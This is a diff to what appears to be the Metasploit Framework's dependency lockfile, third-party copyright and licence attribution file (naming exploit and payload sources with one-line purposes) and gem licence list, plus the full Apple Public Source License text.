      activemodel (>= 4.2, < 8.0)
      activesupport (>= 4.2, < 8.0)
-    xmlrpc (0.3.2)
+    xmlrpc (0.3.3)
      webrick
-    yard (0.9.28)
-      webrick (~> 1.7.0)
-    zeitwerk (2.6.0)
+    yard (0.9.34)
+    zeitwerk (2.6.12)

 PLATFORMS
  ruby

 DEPENDENCIES
+  allure-rspec
+  debug (>= 1.0.0)
  factory_bot_rails
  fivemat
  memory_profiler
@@ -515,6 +566,7 @@ DEPENDENCIES
  rubocop
  ruby-prof (= 1.4.2)
  simplecov (= 0.18.2)
+  test-prof
  timecop
  yard

@@ -19,46 +19,128 @@ Files: data/exploits/mysql/lib_mysqludf_sys_*.so
 Copyright: 2007  Roland Bouman
           2008-2010  Roland Bouman and Bernardo Damele A. G.
 License: LGPL-2.1
+Purpose: These files are used in exploits/multi/mysql/mysql_udf_payload.rb
+
+Files: data/exploits/cve-2023-34634/test.png
+Copyright: 2023 Brendan Watters
+License: MIT
+Purpose: These image is used as the default file to embed the exploit command.
+
+Files: data/headers/windows/c_payload_util/beacon.h
+Copyright: 2022, Copyright Help/Systems LLC and its group of companies.
+License: Apache 2.0
+
+Files: data/jtr/*
+Copyright: Copyright 1996-2013 by Solar Designer
+License: GNU GPL 2.0
+
+Files: data/post/SharpHound.exe
+       data/post/powershell/SharpHound.ps1
+Copyright (C) 2016-2022 Specter Ops Inc.
+License: GNU GPL 3.0
+Purpose: These files are uploaded and executed by
+         post/windows/gather/bloodhound.

 Files: data/templates/to_mem_pshreflection.ps1.template
 Copyright: 2012, Matthew Graeber
 License: BSD-3-clause

-Files: external/source/exploits/IE11SandboxEscapes/*
-Copyright: James Forshaw, 2014
-License: GPLv3
+Files: data/webcam/api.js
+Copyright: Copyright 2013 Muaz Khan<@muazkh>.
+License: MIT
+
+Files: data/wordlists/flask_secret_keys.txt
+Source: https://github.com/Paradoxis/Flask-Unsign-Wordlist/blob/v2023.34/flask_unsign_wordlist/wordlists/github.txt
+Copyright: Copyright (c) 2023 Luke Paris (Paradoxis)
+License: MIT

 Files: external/source/byakugan/*
 Copyright: Lurene Grenier, 2009
 License: BSD-3-clause

+Files: external/source/evasion/windows/process_herpaderping/ProcessHerpaderping/*
+Copyright: 2020 Johnny Shaw
+License: MIT
+
+Files: external/source/exploits/CVE-2018-8120/*
+Copyright: 2018
+License: GNU GPL 3
+Purpose: This supports exploits/windows/local/ms18_8120_win32k_privesc module
+
+Files: external/source/exploits/CVE-2022-1043/cve-2022-1043.c
+Copyright: 2022 Open Source Security, Inc.
+License: GNU GPL 2.0
+Purpose: This source file is necessary for users to create a stand-alone executable
+         to exploit CVE-2022-1043, a local privilege escalation vulnerability in
+         Linux kernels 5.12-rc3 - 5.14-rc7.
+
+Files: external/source/exploits/CVE-2022-22942/cve-2022-22942-dc.c
+Copyright: 2022 Open Source Security, Inc.
+License: GNU GPL 2.0
+Purpose: This source file is necessary for users to create a stand-alone executable
+         to exploit CVE-2022-22942, a local privilege escalation vulnerability in
+         Linux kernels 4.14-rc1 - 5.17-rc1.
+
+Files: exteneral/source/exploits/CVE-2022-26904/*
+Copyright: 2022 Abdelhamid Naceri
+License: MIT
+
+Files: external/source/exploits/CVE-2023-36874/*
+Copyright: 2023 Octoberfest7
+License: MIT
+Purpose: Library and error report file are required for calculating offsets to the correct
+         function calls to implement the exploit.  The heavily modified C main is necessary
+         to create and trigger the exploit.
+
+Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
+Copyright: 2011 Jon Bringhurst
+License: GNU GPL 2.0
+
+Files: external/source/exploits/IE11SandboxEscapes/*
+Copyright: James Forshaw, 2014
+License: GPLv3
+Purpose: This set of source code supports the following modules
+         exploits/windows/local/ms13_097_ie_registry_symlink.rb
+         exploits/windows/local/ms14_009_ie_dfsvc.rb
+
 Files: external/source/ipwn/*
 Copyright: 2004-2005 vlad902 <vlad902 [at] gmail.com>
           2007 H D Moore <hdm [at] metasploit.com>
 License: GPL-2 and Artistic
-
-Files: external/source/ReflectiveDLLInjection/*
-Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-License: BSD-3-clause
+Purpose: These files are used in payloads/stages/osx/armle/execute

 Files: external/source/metsvc/*
 Copyright: 2007, Determina Inc.
 License: BSD-3-clause

-Files: external/source/tightvnc/*
-Copyright: 1999 AT&T Laboratories Cambridge.
-           2000 Tridia Corp.
-           2002-2003 RealVNC Ltd.
-           2001-2004 HorizonLive.com, Inc.
-           2000-2007 Constantin Kaplinsky
-           2000-2009 TightVNC Group
-License: GPL-2
+Files: external/source/osx/isight/*
+Copyright: 2009
+License: GPL
+Purpose: Used in modules/payloads/stages/osx/x86/isight to capture images.
+
+Files: external/source/pxesploit/regeditor/ntreg.h
+       external/source/pxesploit/regeditor/ntreg.c
+Copyright: 1997-2010, Petter Nordahl-Hagen
+License: LGPL
+Purpose: Unknown. These files are used to create a linux binary called regeditor
+         which allows a linux OS to edit a Windows registry. It is used in
+         pxesploit modules.
+
+Files: external/source/ReflectiveDLLInjection/*
+Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+License: BSD-3-clause
+
+Files: external/source/shellcode/windows/build.sh
+Copyright: 2009
+License: GPL / Perl Artistic
+Purpose: A perl script to build some of the x86 Windows payloads.

 Files: external/source/unixasm/*
 Copyright: 2004-2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
 License: BSD-4-clause

 Files: external/source/vncdll/winvnc/*
+       external/source/tightvnc/*
 Copyright: 1999 AT&T Laboratories Cambridge.
           2000 Tridia Corp.
           2002-2003 RealVNC Ltd.
@@ -66,8 +148,19 @@ Copyright: 1999 AT&T Laboratories Cambridge.
           2000-2006 Constantin Kaplinsky.
           2000-2009 TightVNC Group
 License: GPL-2
+Purpose: The built result is used in:
+           payloads/stages/windows/vncinject.rb
+           payloads/stages/windows/x64/vncinject.rb

-Files: lib/anemone.rb lib/anemone/*
+Files: external/source/exploits/CVE-2022-46689/vm_unaligned_copy_switch_race.c
+Copyright: 1999-2007 Apple Inc.
+License: Apple
+Purpose: This source file is necessary for users to create a stand-alone executable
+         to exploit CVE-2022-46689, a local privilege escalation vulnerability in
+         MacOSX versions (macOS dirty cow)
+
+Files: lib/anemone.rb
+       lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT

@@ -76,14 +169,22 @@ Copyright: 2017 Yukihiro Matsumoto
 License: Ruby

 Files: lib/msf/core/modules/external/python/async_timeout/*
-Copyright: 2016-2017 Andrew Svetlov
+Copyright: 2016-2023 Andrew Svetlov
 License: Apache 2.0

-Files: lib/net/dns.rb lib/net/dns/*
+Files: lib/msf/core/web_services/public/*
+       lib/msf/core/web_services/views/api_docs.erb
+Copyright: Copyright 2018 SmartBear Software
+License: Apache 2.0
+
+Files: lib/net/dns.rb
+       lib/net/dns/*
 Copyright: 2006 Marco Ceresa
 License: Ruby

-Files: lib/postgres_msf.rb lib/postgres/postgres-pr/message.rb lib/postgres/postgres-pr/connection.rb
+Files: lib/postgres_msf.rb
+       lib/postgres/postgres-pr/message.rb
+       lib/postgres/postgres-pr/connection.rb
 Copyright: 2005 Michael Neumann
 License: BSD-3-clause or Ruby

@@ -91,11 +192,13 @@ Files: lib/rabal/*
 Copyright: Jeremy Hinegadner <jeremy at hinegardner dot org>
 License: Ruby

-Files: lib/rbmysql.rb lib/rbmysql/*
+Files: lib/rbmysql.rb
+       lib/rbmysql/*
 Copyright: 2009 tommy
 License: Ruby

-Files: lib/snmp.rb lib/snmp/*
+Files: lib/snmp.rb
+       lib/snmp/*
 Copyright: 2004, David R. Halliday
 License: Ruby

@@ -103,37 +206,81 @@ Files: lib/windows_console_color_support.rb
 Copyright: 2011 Michael 'mihi' Schierl
 License: BSD-3-clause

-Files: lib/zip.rb lib/zip/*
+Files: lib/zip.rb
+       lib/zip/*
 Copyright: 2002-2004, Thomas Sandergaard
 License: Ruby

+Files: modules/auxiliary/dos/cisco/cisco_7937g_dos.py
+Copyright: 2020, Cody Martin
+License: GPL
+Purpose: This module allows an attacker to render a Cisco 7937G unresponsive
+         until it is manually power cycled.
+
+Files: modules/auxiliary/dos/cisco/cisco_7937g_dos_reboot.py
+Copyright: 2020, Cody Martin
+License: GPL
+Purpose: This module allows an attacker to render a Cisco 7937G unresponsive
+         until it automatically power cycles.
+
+Files: modules/auxiliary/admin/http/cisco_7937g_ssh_privesc.py
+Copyright: 2020, Cody Martin
+License: GPL
+Purpose: This module allows an unauthenticated user to change the credentials
+         for SSH access on a Cisco 7937G device.
+
+Files: modules/auxiliary/gather/office365userenum.py
+Copyright: 2015  Oliver Morton
+License: GPL
+Purpose: Enumerates valid usernames from Office 365 using ActiveSync.
+
+Files: modules/exploits/linux/local/bpf_priv_esc.rb
+       data/exploits/CVE-2016-4557/hello
+Copyright: 2001-2007
+License: GPL
+Purpose: This module contains the source code for FUSE, which this module
+         uploads and compiles or uploads a precompiled binary (hello).
+
+Files: modules/exploits/linux/local/ntfs3g_priv_esc.rb
+Copyright: 2017
+License: GPLv2
+Purpose: The Ruby file contains the text of several modules from exploit-db
+         which it compiles and uploads to the target to elevate privileges.
+
+Files: modules/exploits/unix/fileformat/metasploit_libnotify_cmd_injection.rb
+Copyright: 2020
+License: GPL
+Purpose: This module targets a vulnerability in Metasploit Framework versions
+         prior to 5.0.86.
+
+Files: modules/exploits/windows/smb/ms04_007_killbill.rb
+Copyright: 2004, Solar Eclipse
+License: GPL
+Purpose: The module exploits the Windows ASN.1 vulnerability in Windows 2000
+         SP2-SP4 and Windows XP SP0-SP1. It contains code ported from a GPLv2
+         module.
+
 Files: modules/payloads/singles/windows/speak_pwned.rb
 Copyright: 2009-2010 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
 License: BSD-3-clause

-Files: data/webcam/api.js
-Copyright: Copyright 2013 Muaz Khan<@muazkh>.
-License: MIT
+Files: modules/payloads/singles/windows/x64/messagebox.rb
+Copyright: 2018, jaguinaga
+License: GPL
+Purpose: This module allows us to create an x64 Windows messagebox payload.

-Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_docs.erb
-Copyright: Copyright 2018 SmartBear Software
-License: Apache 2.0
+Files: modules/post/linux/dos/xen_420_dos.rb
+Copyright: 2016
+License: GPL
+Purpose: This module crashes the Xen 4.2.0 hypervisor when run in a
+         paravirtualized VM. It contains a short code section licensed through
+         GPL.

-Files: data/jtr/*
-Copyright: Copyright 1996-2013 by Solar Designer
-License: GNU GPL 2.0
-
-Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
-Copyright: 2011 Jon Bringhurst
-License: GNU GPL 2.0
-
-Files: external/source/evasion/windows/process_herpaderping/ProcessHerpaderping/*
-Copyright: 2020 Johnny Shaw
-License: MIT
-
-Files: exteneral/source/exploits/CVE-2022-26904/*
-Copywrite: 2022 Abdelhamid Naceri
-License: MIT
+Files: tools/exploit/metasm_shell.rb
+Copyright: 2007, Yoann GUILLOT
+License: LGPL
+Purpose: Allows users to invoke an interactive metasm shell to get opcodes from
+assembly instructions.

 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without modification,
@@ -889,3 +1036,372 @@ License: Zlib
 2. Altered source versions must be plainly marked as such, and must not be
    misrepresented as being the original software.
 3. This notice may not be removed or altered from any source distribution.
+
+License: Apple
+APPLE PUBLIC SOURCE LICENSE
+Version 2.0 - August 6, 2003
+
+Please read this License carefully before downloading this software.
+By downloading or using this software, you are agreeing to be bound by
+the terms of this License. If you do not or cannot agree to the terms
+of this License, please do not download or use the software.
+
+1. General; Definitions. This License applies to any program or other
+work which Apple Computer, Inc. ("Apple") makes publicly available and
+which contains a notice placed by Apple identifying such program or
+work as "Original Code" and stating that it is subject to the terms of
+this Apple Public Source License version 2.0 ("License"). As used in
+this License:
+
+1.1 "Applicable Patent Rights" mean: (a) in the case where Apple is
+the grantor of rights, (i) claims of patents that are now or hereafter
+acquired, owned by or assigned to Apple and (ii) that cover subject
+matter contained in the Original Code, but only to the extent
+necessary to use, reproduce and/or distribute the Original Code
+without infringement; and (b) in the case where You are the grantor of
+rights, (i) claims of patents that are now or hereafter acquired,
+owned by or assigned to You and (ii) that cover subject matter in Your
+Modifications, taken alone or in combination with Original Code.
+
+1.2 "Contributor" means any person or entity that creates or
+contributes to the creation of Modifications.
+
+1.3 "Covered Code" means the Original Code, Modifications, the
+combination of Original Code and any Modifications, and/or any
+respective portions thereof.
+
+1.4 "Externally Deploy" means: (a) to sublicense, distribute or
+otherwise make Covered Code available, directly or indirectly, to
+anyone other than You; and/or (b) to use Covered Code, alone or as
+part of a Larger Work, in any way to provide a service, including but
+not limited to delivery of content, through electronic communication
+with a client other than You.
+
+1.5 "Larger Work" means a work which combines Covered Code or portions
+thereof with code not governed by the terms of this License.
+
+1.6 "Modifications" mean any addition to, deletion from, and/or change
+to, the substance and/or structure of the Original Code, any previous
+Modifications, the combination of Original Code and any previous
+Modifications, and/or any respective portions thereof. When code is
+released as a series of files, a Modification is: (a) any addition to
+or deletion from the contents of a file containing Covered Code;
+and/or (b) any new file or other representation of computer program
+statements that contains any part of Covered Code.
+
+1.7 "Original Code" means (a) the Source Code of a program or other
+work as originally made available by Apple under this License,
+including the Source Code of any updates or upgrades to such programs
+or works made available by Apple under this License, and that has been
+expressly identified by Apple as such in the header file(s) of such
+work; and (b) the object code compiled from such Source Code and
+originally made available by Apple under this License.
+
+1.8 "Source Code" means the human readable form of a program or other
+work that is suitable for making modifications to it, including all
+modules it contains, plus any associated interface definition files,
+scripts used to control compilation and installation of an executable
+(object code).
+
+1.9 "You" or "Your" means an individual or a legal entity exercising
+rights under this License. For legal entities, "You" or "Your"
+includes any entity which controls, is controlled by, or is under
+common control with, You, where "control" means (a) the power, direct
+or indirect, to cause the direction or management of such entity,
+whether by contract or otherwise, or (b) ownership of fifty percent
+(50%) or more of the outstanding shares or beneficial ownership of
+such entity.
+
+2. Permitted Uses; Conditions & Restrictions. Subject to the terms
+and conditions of this License, Apple hereby grants You, effective on
+the date You accept this License and download the Original Code, a
+world-wide, royalty-free, non-exclusive license, to the extent of
+Apple's Applicable Patent Rights and copyrights covering the Original
+Code, to do the following:
+
+2.1 Unmodified Code. You may use, reproduce, display, perform,
+internally distribute within Your organization, and Externally Deploy
+verbatim, unmodified copies of the Original Code, for commercial or
+non-commercial purposes, provided that in each instance:
+
+(a) You must retain and reproduce in all copies of Original Code the
+copyright and other proprietary notices and disclaimers of Apple as
+they appear in the Original Code, and keep intact all notices in the
+Original Code that refer to this License; and
+
+(b) You must include a copy of this License with every copy of Source
+Code of Covered Code and documentation You distribute or Externally
+Deploy, and You may not offer or impose any terms on such Source Code
+that alter or restrict this License or the recipients' rights
+hereunder, except as permitted under Section 6.
+
+2.2 Modified Code. You may modify Covered Code and use, reproduce,
+display, perform, internally distribute within Your organization, and
+Externally Deploy Your Modifications and Covered Code, for commercial
+or non-commercial purposes, provided that in each instance You also
+meet all of these conditions:
+
+(a) You must satisfy all the conditions of Section 2.1 with respect to
+the Source Code of the Covered Code;
+
+(b) You must duplicate, to the extent it does not already exist, the
+notice in Exhibit A in each file of the Source Code of all Your
+Modifications, and cause the modified files to carry prominent notices
+stating that You changed the files and the date of any change; and
+
+(c) If You Externally Deploy Your Modifications, You must make
+Source Code of all Your Externally Deployed Modifications either
+available to those to whom You have Externally Deployed Your
+Modifications, or publicly available. Source Code of Your Externally
+Deployed Modifications must be released under the terms set forth in
+this License, including the license grants set forth in Section 3
+below, for as long as you Externally Deploy the Covered Code or twelve
+(12) months from the date of initial External Deployment, whichever is
+longer. You should preferably distribute the Source Code of Your
+Externally Deployed Modifications electronically (e.g. download from a
+web site).
+
+2.3 Distribution of Executable Versions. In addition, if You
+Externally Deploy Covered Code (Original Code and/or Modifications) in
+object code, executable form only, You must include a prominent
+notice, in the code itself as well as in related documentation,
+stating that Source Code of the Covered Code is available under the
+terms of this License with information on how and where to obtain such
+Source Code.
+
+2.4 Third Party Rights. You expressly acknowledge and agree that
+although Apple and each Contributor grants the licenses to their
+respective portions of the Covered Code set forth herein, no
+assurances are provided by Apple or any Contributor that the Covered
+Code does not infringe the patent or other intellectual property
+rights of any other entity. Apple and each Contributor disclaim any
+liability to You for claims brought by any other entity based on
+infringement of intellectual property rights or otherwise. As a
+condition to exercising the rights and licenses granted hereunder, You
+hereby assume sole responsibility to secure any other intellectual
+property rights needed, if any. For example, if a third party patent
+license is required to allow You to distribute the Covered Code, it is
+Your responsibility to acquire that license before distributing the
+Covered Code.
+
+3. Your Grants. In consideration of, and as a condition to, the
+licenses granted to You under this License, You hereby grant to any
+person or entity receiving or distributing Covered Code under this
+License a non-exclusive, royalty-free, perpetual, irrevocable license,
+under Your Applicable Patent Rights and other intellectual property
+rights (other than patent) owned or controlled by You, to use,
+reproduce, display, perform, modify, sublicense, distribute and
+Externally Deploy Your Modifications of the same scope and extent as
+Apple's licenses under Sections 2.1 and 2.2 above.
+
+4. Larger Works. You may create a Larger Work by combining Covered
+Code with other code not governed by the terms of this License and
+distribute the Larger Work as a single product. In each such instance,
+You must make sure the requirements of this License are fulfilled for
+the Covered Code or any portion thereof.
+
+5. Limitations on Patent License. Except as expressly stated in
+Section 2, no other patent rights, express or implied, are granted by
+Apple herein. Modifications and/or Larger Works may require additional
+patent licenses from Apple which Apple may grant in its sole
+discretion.
+
+6. Additional Terms. You may choose to offer, and to charge a fee for,
+warranty, support, indemnity or liability obligations and/or other
+rights consistent with the scope of the license granted herein
+("Additional Terms") to one or more recipients of Covered Code.
+However, You may do so only on Your own behalf and as Your sole
+responsibility, and not on behalf of Apple or any Contributor. You
+must obtain the recipient's agreement that any such Additional Terms
+are offered by You alone, and You hereby agree to indemnify, defend
+and hold Apple and every Contributor harmless for any liability
+incurred by or claims asserted against Apple or such Contributor by
+reason of any such Additional Terms.
+
+7. Versions of the License. Apple may publish revised and/or new
+versions of this License from time to time. Each version will be given
+a distinguishing version number. Once Original Code has been published
+under a particular version of this License, You may continue to use it
+under the terms of that version. You may also choose to use such
+Original Code under the terms of any subsequent version of this
+License published by Apple. No one other than Apple has the right to
+modify the terms applicable to Covered Code created under this
+License.
+
+8. NO WARRANTY OR SUPPORT. The Covered Code may contain in whole or in
+part pre-release, untested, or not fully tested works. The Covered
+Code may contain errors that could cause failures or loss of data, and
+may be incomplete or contain inaccuracies. You expressly acknowledge
+and agree that use of the Covered Code, or any portion thereof, is at
+Your sole and entire risk. THE COVERED CODE IS PROVIDED "AS IS" AND
+WITHOUT WARRANTY, UPGRADES OR SUPPORT OF ANY KIND AND APPLE AND
+APPLE'S LICENSOR(S) (COLLECTIVELY REFERRED TO AS "APPLE" FOR THE
+PURPOSES OF SECTIONS 8 AND 9) AND ALL CONTRIBUTORS EXPRESSLY DISCLAIM
+ALL WARRANTIES AND/OR CONDITIONS, EXPRESS OR IMPLIED, INCLUDING, BUT
+NOT LIMITED TO, THE IMPLIED WARRANTIES AND/OR CONDITIONS OF
+MERCHANTABILITY, OF SATISFACTORY QUALITY, OF FITNESS FOR A PARTICULAR
+PURPOSE, OF ACCURACY, OF QUIET ENJOYMENT, AND NONINFRINGEMENT OF THIRD
+PARTY RIGHTS. APPLE AND EACH CONTRIBUTOR DOES NOT WARRANT AGAINST
+INTERFERENCE WITH YOUR ENJOYMENT OF THE COVERED CODE, THAT THE
+FUNCTIONS CONTAINED IN THE COVERED CODE WILL MEET YOUR REQUIREMENTS,
+THAT THE OPERATION OF THE COVERED CODE WILL BE UNINTERRUPTED OR
+ERROR-FREE, OR THAT DEFECTS IN THE COVERED CODE WILL BE CORRECTED. NO
+ORAL OR WRITTEN INFORMATION OR ADVICE GIVEN BY APPLE, AN APPLE
+AUTHORIZED REPRESENTATIVE OR ANY CONTRIBUTOR SHALL CREATE A WARRANTY.
+You acknowledge that the Covered Code is not intended for use in the
+operation of nuclear facilities, aircraft navigation, communication
+systems, or air traffic control machines in which case the failure of
+the Covered Code could lead to death, personal injury, or severe
+physical or environmental damage.
+
+9. LIMITATION OF LIABILITY. TO THE EXTENT NOT PROHIBITED BY LAW, IN NO
+EVENT SHALL APPLE OR ANY CONTRIBUTOR BE LIABLE FOR ANY INCIDENTAL,
+SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES ARISING OUT OF OR RELATING
+TO THIS LICENSE OR YOUR USE OR INABILITY TO USE THE COVERED CODE, OR
+ANY PORTION THEREOF, WHETHER UNDER A THEORY OF CONTRACT, WARRANTY,
+TORT (INCLUDING NEGLIGENCE), PRODUCTS LIABILITY OR OTHERWISE, EVEN IF
+APPLE OR SUCH CONTRIBUTOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
+DAMAGES AND NOTWITHSTANDING THE FAILURE OF ESSENTIAL PURPOSE OF ANY
+REMEDY. SOME JURISDICTIONS DO NOT ALLOW THE LIMITATION OF LIABILITY OF
+INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION MAY NOT APPLY
+TO YOU. In no event shall Apple's total liability to You for all
+damages (other than as may be required by applicable law) under this
+License exceed the amount of fifty dollars ($50.00).
+
+10. Trademarks. This License does not grant any rights to use the
+trademarks or trade names "Apple", "Apple Computer", "Mac", "Mac OS",
+"QuickTime", "QuickTime Streaming Server" or any other trademarks,
+service marks, logos or trade names belonging to Apple (collectively
+"Apple Marks") or to any trademark, service mark, logo or trade name
+belonging to any Contributor. You agree not to use any Apple Marks in
+or as part of the name of products derived from the Original Code or
+to endorse or promote products derived from the Original Code other
+than as expressly permitted by and in strict compliance at all times
+with Apple's third party trademark usage guidelines which are posted
+at http://www.apple.com/legal/guidelinesfor3rdparties.html.
+
+11. Ownership. Subject to the licenses granted under this License,
+each Contributor retains all rights, title and interest in and to any
+Modifications made by such Contributor. Apple retains all rights,
+title and interest in and to the Original Code and any Modifications
+made by or on behalf of Apple ("Apple Modifications"), and such Apple
+Modifications will not be automatically subject to this License. Apple
+may, at its sole discretion, choose to license such Apple
+Modifications under this License, or on different terms from those
+contained in this License or may choose not to license them at all.
+
+12. Termination.
+
+12.1 Termination. This License and the rights granted hereunder will
+terminate:
+
+(a) automatically without notice from Apple if You fail to comply with
+any term(s) of this License and fail to cure such breach within 30
+days of becoming aware of such breach;
+
+(b) immediately in the event of the circumstances described in Section
+13.5(b); or
+
+(c) automatically without notice from Apple if You, at any time during
+the term of this License, commence an action for patent infringement
+against Apple; provided that Apple did not first commence
+an action for patent infringement against You in that instance.
+
+12.2 Effect of Termination. Upon termination, You agree to immediately
+stop any further use, reproduction, modification, sublicensing and
+distribution of the Covered Code. All sublicenses to the Covered Code
+which have been properly granted prior to termination shall survive
+any termination of this License. Provisions which, by their nature,
+should remain in effect beyond the termination of this License shall
+survive, including but not limited to Sections 3, 5, 8, 9, 10, 11,
+12.2 and 13. No party will be liable to any other for compensation,
+indemnity or damages of any sort solely as a result of terminating
+this License in accordance with its terms, and termination of this
+License will be without prejudice to any other right or remedy of
+any party.
+
+13. Miscellaneous.
+
+13.1 Government End Users. The Covered Code is a "commercial item" as
+defined in FAR 2.101. Government software and technical data rights in
+the Covered Code include only those rights customarily provided to the
+public as defined in this License. This customary commercial license
+in technical data and software is provided in accordance with FAR
+12.211 (Technical Data) and 12.212 (Computer Software) and, for
+Department of Defense purchases, DFAR 252.227-7015 (Technical Data --
+Commercial Items) and 227.7202-3 (Rights in Commercial Computer
+Software or Computer Software Documentation). Accordingly, all U.S.
+Government End Users acquire Covered Code with only those rights set
+forth herein.
+
+13.2 Relationship of Parties. This License will not be construed as
+creating an agency, partnership, joint venture or any other form of
+legal association between or among You, Apple or any Contributor, and
+You will not represent to the contrary, whether expressly, by
+implication, appearance or otherwise.
+
+13.3 Independent Development. Nothing in this License will impair
+Apple's right to acquire, license, develop, have others develop for
+it, market and/or distribute technology or products that perform the
+same or similar functions as, or otherwise compete with,
+Modifications, Larger Works, technology or products that You may
+develop, produce, market or distribute.
+
+13.4 Waiver; Construction. Failure by Apple or any Contributor to
+enforce any provision of this License will not be deemed a waiver of
+future enforcement of that or any other provision. Any law or
+regulation which provides that the language of a contract shall be
+construed against the drafter will not apply to this License.
+
+13.5 Severability. (a) If for any reason a court of competent
+jurisdiction finds any provision of this License, or portion thereof,
+to be unenforceable, that provision of the License will be enforced to
+the maximum extent permissible so as to effect the economic benefits
+and intent of the parties, and the remainder of this License will
+continue in full force and effect. (b) Notwithstanding the foregoing,
+if applicable law prohibits or restricts You from fully and/or
+specifically complying with Sections 2 and/or 3 or prevents the
+enforceability of either of those Sections, this License will
+immediately terminate and You must immediately discontinue any use of
+the Covered Code and destroy all copies of it that are in your
+possession or control.
+
+13.6 Dispute Resolution. Any litigation or other dispute resolution
+between You and Apple relating to this License shall take place in the
+Northern District of California, and You and Apple hereby consent to
+the personal jurisdiction of, and venue in, the state and federal
+courts within that District with respect to this License. The
+application of the United Nations Convention on Contracts for the
+International Sale of Goods is expressly excluded.
+
+13.7 Entire Agreement; Governing Law. This License constitutes the
+entire agreement between the parties with respect to the subject
+matter hereof. This License shall be governed by the laws of the
+United States and the State of California, except that body of
+California law concerning conflicts of law.
+
+Where You are located in the province of Quebec, Canada, the following
+clause applies: The parties hereby confirm that they have requested
+that this License and all related documents be drafted in English. Les
+parties ont exige que le present contrat et tous les documents
+connexes soient rediges en anglais.
+
+EXHIBIT A.
+
+"Portions Copyright (c) 1999-2003 Apple Computer, Inc. All Rights
+Reserved.
+
+This file contains Original Code and/or Modifications of Original Code
+as defined in and that are subject to the Apple Public Source License
+Version 2.0 (the 'License'). You may not use this file except in
+compliance with the License. Please obtain a copy of the License at
+http://www.opensource.apple.com/apsl/ and read it before using this
+file.
+
+The Original Code and all software distributed under the License are
+distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+Please see the License for the specific language governing rights and
+limitations under the License."
@@ -1,52 +1,60 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.1.0, MIT
-actionpack, 6.1.6, MIT
-actionview, 6.1.6, MIT
-activemodel, 6.1.6, MIT
-activerecord, 6.1.6, MIT
-activesupport, 6.1.6, MIT
-addressable, 2.8.0, "Apache 2.0"
+actionpack, 7.0.8, MIT
+actionview, 7.0.8, MIT
+activemodel, 7.0.8, MIT
+activerecord, 7.0.8, MIT
+activesupport, 7.0.8, MIT
+addressable, 2.8.5, "Apache 2.0"
 afm, 0.2.2, MIT
+allure-rspec, 2.23.0, "Apache 2.0"
+allure-ruby-commons, 2.23.0, "Apache 2.0"
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.598.0, "Apache 2.0"
-aws-sdk-core, 3.131.1, "Apache 2.0"
-aws-sdk-ec2, 1.317.0, "Apache 2.0"
-aws-sdk-iam, 1.69.0, "Apache 2.0"
-aws-sdk-kms, 1.57.0, "Apache 2.0"
-aws-sdk-s3, 1.114.0, "Apache 2.0"
-aws-sigv4, 1.5.0, "Apache 2.0"
-bcrypt, 3.1.18, MIT
+aws-partitions, 1.834.0, "Apache 2.0"
+aws-sdk-core, 3.185.1, "Apache 2.0"
+aws-sdk-ec2, 1.411.0, "Apache 2.0"
+aws-sdk-ec2instanceconnect, 1.34.0, "Apache 2.0"
+aws-sdk-iam, 1.87.0, "Apache 2.0"
+aws-sdk-kms, 1.72.0, "Apache 2.0"
+aws-sdk-s3, 1.136.0, "Apache 2.0"
+aws-sdk-ssm, 1.158.0, "Apache 2.0"
+aws-sigv4, 1.6.0, "Apache 2.0"
+base64, 0.1.1, "ruby, Simplified BSD"
+bcrypt, 3.1.19, MIT
 bcrypt_pbkdf, 1.1.0, MIT
-bindata, 2.4.10, ruby
+bindata, 2.4.15, "Simplified BSD"
+bootsnap, 1.16.0, MIT
 bson, 4.15.0, "Apache 2.0"
 builder, 3.2.4, MIT
 bundler, 2.1.4, MIT
 byebug, 11.1.3, "Simplified BSD"
+chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.0.5, MIT
+concurrent-ruby, 1.2.2, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
+date, 3.3.3, "ruby, Simplified BSD"
+debug, 1.8.0, "ruby, Simplified BSD"
 diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
-digest, 3.1.0, "ruby, Simplified BSD"
-dnsruby, 1.61.9, "Apache 2.0"
+dnsruby, 1.70.0, "Apache 2.0"
 docile, 1.4.0, MIT
 domain_name, 0.5.20190701, "Simplified BSD, New BSD, Mozilla Public License 2.0"
 ed25519, 1.3.0, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.2, MIT
-erubi, 1.10.0, MIT
+erubi, 1.12.0, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.2.1, MIT
 factory_bot_rails, 6.2.0, MIT
-faker, 2.21.0, MIT
-faraday, 2.3.0, MIT
-faraday-net_http, 2.0.3, MIT
-faraday-retry, 1.0.3, MIT
-faye-websocket, 0.11.1, "Apache 2.0"
-ffi, 1.15.5, "New BSD"
+faker, 3.2.1, MIT
+faraday, 2.7.11, MIT
+faraday-net_http, 3.0.2, MIT
+faraday-retry, 2.2.0, MIT
+faye-websocket, 0.11.3, "Apache 2.0"
+ffi, 1.16.3, "New BSD"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
